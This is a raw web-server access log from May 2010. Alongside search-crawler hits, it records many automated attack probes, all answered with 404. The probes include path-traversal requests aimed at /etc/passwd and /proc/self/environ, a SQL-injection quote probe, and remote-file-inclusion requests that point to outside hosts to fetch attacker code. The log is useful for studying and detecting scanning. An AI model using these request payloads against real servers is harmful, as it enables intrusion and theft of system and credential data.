213.160.120.204 - - [19/May/2010:23:20:06 -0500] "GET /logs/_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 303 "-""libwww-perl/5.805"
82.165.196.223 - - [19/May/2010:23:22:44 -0500] "GET //include/mail.inc.php?root=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 305 "-""-"
82.165.196.223 - - [19/May/2010:23:22:44 -0500] "GET //include/mail.inc.php?root=./../../../../../../../../etc/passwd HTTP/1.1" 404 305 "-""-"
67.192.97.194 - - [19/May/2010:23:24:04 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.cttimes.co.kr//bbs/data/fta/sc1?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.192.97.194 - - [19/May/2010:23:24:04 -0500] "GET //skin/zero_vote/error.php?dir=http://www.cttimes.co.kr//bbs/data/fta/sc1?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.192.97.194 - - [19/May/2010:23:24:04 -0500] "GET /logs/access_log.1265760000//skin/zero_vote/error.php?dir=http://www.cttimes.co.kr//bbs/data/fta/sc1?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.192.97.194 - - [19/May/2010:23:24:09 -0500] "GET /logs/access_log.1265241600//skin/zero_vote/error.php?dir=http://www.cttimes.co.kr//bbs/data/fta/sc1?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
213.160.120.204 - - [19/May/2010:23:24:41 -0500] "GET /logs/access_log.1273363200//shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 333 "-""libwww-perl/5.805"
213.160.120.204 - - [19/May/2010:23:24:41 -0500] "GET //shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 306 "-""libwww-perl/5.805"
213.160.120.204 - - [19/May/2010:23:24:41 -0500] "GET /logs//shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
65.182.191.100 - - [19/May/2010:23:24:47 -0500] "GET /logs/access_log.1273363200//shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 333 "-""libwww-perl/5.811"
65.182.191.100 - - [19/May/2010:23:24:47 -0500] "GET //shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 306 "-""libwww-perl/5.811"
65.182.191.100 - - [19/May/2010:23:24:47 -0500] "GET /logs//shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""libwww-perl/5.811"
74.54.52.210 - - [19/May/2010:23:24:52 -0500] "GET /logs/access_log.1273363200//shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 333 "-""libwww-perl/5.810"
74.54.52.210 - - [19/May/2010:23:24:53 -0500] "GET //shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 306 "-""libwww-perl/5.810"
74.54.52.210 - - [19/May/2010:23:24:53 -0500] "GET /logs//shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
67.192.97.194 - - [19/May/2010:23:25:01 -0500] "GET //skin/zero_vote/error.php?dir=http://www.cttimes.co.kr//bbs/data/fta/sc1?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.192.97.194 - - [19/May/2010:23:25:01 -0500] "GET /logs/access_log.1265760000//skin/zero_vote/error.php?dir=http://www.cttimes.co.kr//bbs/data/fta/sc1?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.192.97.194 - - [19/May/2010:23:25:01 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.cttimes.co.kr//bbs/data/fta/sc1?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
69.168.54.22 - - [19/May/2010:23:25:04 -0500] "GET /logs/access_log.1273363200//shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 333 "-""libwww-perl/5.805"
69.168.54.22 - - [19/May/2010:23:25:04 -0500] "GET //shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 306 "-""libwww-perl/5.805"
69.168.54.22 - - [19/May/2010:23:25:04 -0500] "GET /logs//shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
67.192.97.194 - - [19/May/2010:23:25:05 -0500] "GET /logs/access_log.1265241600//skin/zero_vote/error.php?dir=http://www.cttimes.co.kr//bbs/data/fta/sc1?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
196.35.158.182 - - [19/May/2010:23:25:16 -0500] "GET /_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
196.35.158.182 - - [19/May/2010:23:25:16 -0500] "GET /logs/_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 303 "-""libwww-perl/5.834"
67.195.112.180 - - [19/May/2010:23:25:17 -0500] "GET /costume/costume1.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
196.35.158.182 - - [19/May/2010:23:25:17 -0500] "GET /logs/access_log.1272844800/_functions.php?prefix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.834"
67.192.97.194 - - [19/May/2010:23:25:19 -0500] "GET //skin/zero_vote/error.php?dir=http://www.cttimes.co.kr//bbs/data/fta/sc1?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.192.97.194 - - [19/May/2010:23:25:19 -0500] "GET /logs/access_log.1265760000//skin/zero_vote/error.php?dir=http://www.cttimes.co.kr//bbs/data/fta/sc1?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.192.97.194 - - [19/May/2010:23:25:20 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.cttimes.co.kr//bbs/data/fta/sc1?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.192.97.194 - - [19/May/2010:23:25:22 -0500] "GET /logs/access_log.1265241600//skin/zero_vote/error.php?dir=http://www.cttimes.co.kr//bbs/data/fta/sc1?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
58.230.162.220 - - [19/May/2010:23:26:01 -0500] "GET /logs/access_log.1271548800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.54.52.210 - - [19/May/2010:23:26:32 -0500] "GET /logs/access_log.1273363200//shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 333 "-""libwww-perl/5.810"
74.54.52.210 - - [19/May/2010:23:26:32 -0500] "GET //shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 306 "-""libwww-perl/5.810"
74.54.52.210 - - [19/May/2010:23:26:32 -0500] "GET /logs//shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
65.182.191.100 - - [19/May/2010:23:26:52 -0500] "GET /logs/access_log.1273363200//shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 333 "-""libwww-perl/5.811"
65.182.191.100 - - [19/May/2010:23:26:52 -0500] "GET //shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 306 "-""libwww-perl/5.811"
65.182.191.100 - - [19/May/2010:23:26:52 -0500] "GET /logs//shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""libwww-perl/5.811"
58.230.162.220 - - [19/May/2010:23:27:25 -0500] "GET /logs/access_log.1265414400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.204.227 - - [19/May/2010:23:28:04 -0500] "GET /logs/?D=A HTTP/1.1" 200 6273 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/May/2010:23:28:20 -0500] "GET /logs/access_log.1169769600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.138 - - [19/May/2010:23:28:35 -0500] "GET /logs/access_log.1167868800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [19/May/2010:23:28:45 -0500] "GET /logs/access_log.1161561600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [19/May/2010:23:32:59 -0500] "GET /logs/access_log.1209686400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.18.19.146 - - [19/May/2010:23:34:40 -0500] "GET //index.php?option=server_stats&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.18.19.146 - - [19/May/2010:23:34:40 -0500] "GET //index.php?option=server_stats&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
87.250.255.243 - - [19/May/2010:23:37:37 -0500] "GET /logs/access_log.1254182400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
213.160.120.204 - - [19/May/2010:23:40:03 -0500] "GET //shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.805"
74.54.52.210 - - [19/May/2010:23:40:06 -0500] "GET //shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.810"
65.182.191.100 - - [19/May/2010:23:40:12 -0500] "GET //shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.811"
207.46.199.183 - - [19/May/2010:23:40:13 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.168.54.22 - - [19/May/2010:23:40:16 -0500] "GET //shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.805"
213.160.120.204 - - [19/May/2010:23:40:39 -0500] "GET /logs/access_log.1273363200//shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 333 "-""libwww-perl/5.805"
213.160.120.204 - - [19/May/2010:23:40:40 -0500] "GET //shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.805"
213.160.120.204 - - [19/May/2010:23:40:40 -0500] "GET /logs//shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
74.54.52.210 - - [19/May/2010:23:40:42 -0500] "GET /logs/access_log.1273363200//shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 333 "-""libwww-perl/5.810"
74.54.52.210 - - [19/May/2010:23:40:42 -0500] "GET //shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.810"
74.54.52.210 - - [19/May/2010:23:40:42 -0500] "GET /logs//shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
65.182.191.100 - - [19/May/2010:23:40:57 -0500] "GET /logs/access_log.1273363200//shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 333 "-""libwww-perl/5.811"
65.182.191.100 - - [19/May/2010:23:40:57 -0500] "GET //shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.811"
65.182.191.100 - - [19/May/2010:23:40:57 -0500] "GET /logs//shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.811"
69.168.54.22 - - [19/May/2010:23:41:01 -0500] "GET /logs/access_log.1273363200//shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 333 "-""libwww-perl/5.805"
69.168.54.22 - - [19/May/2010:23:41:01 -0500] "GET //shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.805"
69.168.54.22 - - [19/May/2010:23:41:02 -0500] "GET /logs//shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
211.180.203.200 - - [19/May/2010:23:42:19 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
211.180.203.200 - - [19/May/2010:23:42:53 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
211.180.203.200 - - [19/May/2010:23:42:53 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.180.203.200 - - [19/May/2010:23:43:04 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
61.135.134.108 - - [19/May/2010:23:43:37 -0500] "GET //index.php?option=server_stats&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
61.135.134.108 - - [19/May/2010:23:43:38 -0500] "GET //index.php?option=server_stats&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.250.255.243 - - [19/May/2010:23:44:11 -0500] "GET /logs/access_log.1171843200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.233 - - [19/May/2010:23:44:36 -0500] "GET /logs/access_log.1236556800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/May/2010:23:49:44 -0500] "GET /logs/access_log.1180483200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.98 - - [19/May/2010:23:50:05 -0500] "GET /logs/access_log.1200096000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/May/2010:23:55:18 -0500] "GET /logs/access_log.1229644800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.18.19.146 - - [20/May/2010:00:00:39 -0500] "GET /logs//index.php?option=happycast_category_lightblack&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.18.19.146 - - [20/May/2010:00:00:39 -0500] "GET //index.php?option=happycast_category_lightblack&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
87.250.255.243 - - [20/May/2010:00:02:53 -0500] "GET /logs/access_log.1172275200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.181 - - [20/May/2010:00:03:05 -0500] "GET /logs/access_log.1201910400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [20/May/2010:00:04:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
66.249.129.245 - - [20/May/2010:00:06:31 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
66.249.129.245 - - [20/May/2010:00:06:32 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.250.255.243 - - [20/May/2010:00:07:30 -0500] "GET /logs/access_log.1193184000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
85.92.73.143 - - [20/May/2010:00:10:10 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
85.92.73.143 - - [20/May/2010:00:10:10 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
211.180.203.200 - - [20/May/2010:00:10:34 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.180.203.200 - - [20/May/2010:00:10:43 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.167.65.30 - - [20/May/2010:00:11:33 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
81.167.65.30 - - [20/May/2010:00:11:33 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
65.55.51.112 - - [20/May/2010:00:11:55 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/May/2010:00:12:08 -0500] "GET /logs/access_log.1163030400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
65.55.51.112 - - [20/May/2010:00:12:41 -0500] "GET /logs/access_log.1170979200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/May/2010:00:17:43 -0500] "GET /logs/access_log.1194912000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.133.201.194 - - [20/May/2010:00:17:58 -0500] "GET /logs/pageid=' HTTP/1.1" 404 297 "-""libwww-perl/5.834"
174.133.201.194 - - [20/May/2010:00:17:58 -0500] "GET /pageid=' HTTP/1.1" 404 292 "-""libwww-perl/5.834"
87.250.255.243 - - [20/May/2010:00:23:26 -0500] "GET /logs/access_log.1213488000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
213.180.89.75 - - [20/May/2010:00:24:09 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.180.89.75 - - [20/May/2010:00:24:09 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
112.216.153.186 - - [20/May/2010:00:26:34 -0500] "GET /logs//setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
112.216.153.186 - - [20/May/2010:00:26:34 -0500] "GET /logs/access_log.1270944000//setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
112.216.153.186 - - [20/May/2010:00:26:34 -0500] "GET //setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
87.252.3.123 - - [20/May/2010:00:27:46 -0500] "GET /logs//include/lib/lib_users.php?main_path=http://sex-perm.ru///1.jpg??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
87.252.3.123 - - [20/May/2010:00:27:46 -0500] "GET //include/lib/lib_users.php?main_path=http://sex-perm.ru///1.jpg??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
87.252.3.123 - - [20/May/2010:00:27:46 -0500] "GET /logs/access_log.1264636800//include/lib/lib_users.php?main_path=http://sex-perm.ru///1.jpg??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:00:28:04 -0500] "GET /logs/access_log.1237507200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.252.3.123 - - [20/May/2010:00:28:13 -0500] "GET //include/lib/lib_users.php?main_path=http://sex-perm.ru///1.jpg??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
87.252.3.123 - - [20/May/2010:00:28:13 -0500] "GET /logs/access_log.1263081600//include/lib/lib_users.php?main_path=http://sex-perm.ru///1.jpg??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
87.252.3.123 - - [20/May/2010:00:28:13 -0500] "GET /logs//include/lib/lib_users.php?main_path=http://sex-perm.ru///1.jpg??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
87.252.3.123 - - [20/May/2010:00:28:13 -0500] "GET /logs/access_log.1264636800//include/lib/lib_users.php?main_path=http://sex-perm.ru///1.jpg??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
87.252.3.123 - - [20/May/2010:00:28:15 -0500] "GET /logs/access_log.1263081600//include/lib/lib_users.php?main_path=http://sex-perm.ru///1.jpg??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
207.46.199.185 - - [20/May/2010:00:29:41 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
112.216.153.186 - - [20/May/2010:00:30:10 -0500] "GET /logs//setup.php?setup[use_category]=1&dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
112.216.153.186 - - [20/May/2010:00:30:10 -0500] "GET //setup.php?setup[use_category]=1&dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
112.216.153.186 - - [20/May/2010:00:30:10 -0500] "GET /logs/access_log.1270944000//setup.php?setup[use_category]=1&dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:00:33:38 -0500] "GET /logs/access_log.1237939200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/May/2010:00:38:26 -0500] "GET /logs/access_log.1191196800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.55.146.200 - - [20/May/2010:00:42:11 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
72.55.146.200 - - [20/May/2010:00:42:11 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
174.121.158.8 - - [20/May/2010:00:43:21 -0500] "GET /logs/index.php?option=com_awiki&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""-"
174.121.158.8 - - [20/May/2010:00:43:21 -0500] "GET /logs/index.php?option=com_awiki&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 298 "-""-"
174.121.158.8 - - [20/May/2010:00:43:21 -0500] "GET /index.php?option=com_awiki&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""-"
174.121.158.8 - - [20/May/2010:00:43:22 -0500] "GET /index.php?option=com_awiki&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 293 "-""-"
112.216.153.186 - - [20/May/2010:00:44:15 -0500] "GET /logs//view.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
112.216.153.186 - - [20/May/2010:00:44:15 -0500] "GET //view.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
112.216.153.186 - - [20/May/2010:00:44:15 -0500] "GET /logs/access_log.1263772800//view.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:00:44:57 -0500] "GET /logs/access_log.1196380800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
112.216.153.186 - - [20/May/2010:00:46:44 -0500] "GET /logs/access_log.1262822400//view.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
112.216.153.186 - - [20/May/2010:00:46:44 -0500] "GET /logs//view.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
112.216.153.186 - - [20/May/2010:00:46:44 -0500] "GET //view.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
67.18.19.146 - - [20/May/2010:00:47:12 -0500] "GET /logs//index.php?option=daerew_45galleryGD&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.18.19.146 - - [20/May/2010:00:47:12 -0500] "GET //index.php?option=daerew_45galleryGD&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.18.19.146 - - [20/May/2010:00:47:36 -0500] "GET /logs//index.php?option=daerew_45galleryGD&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
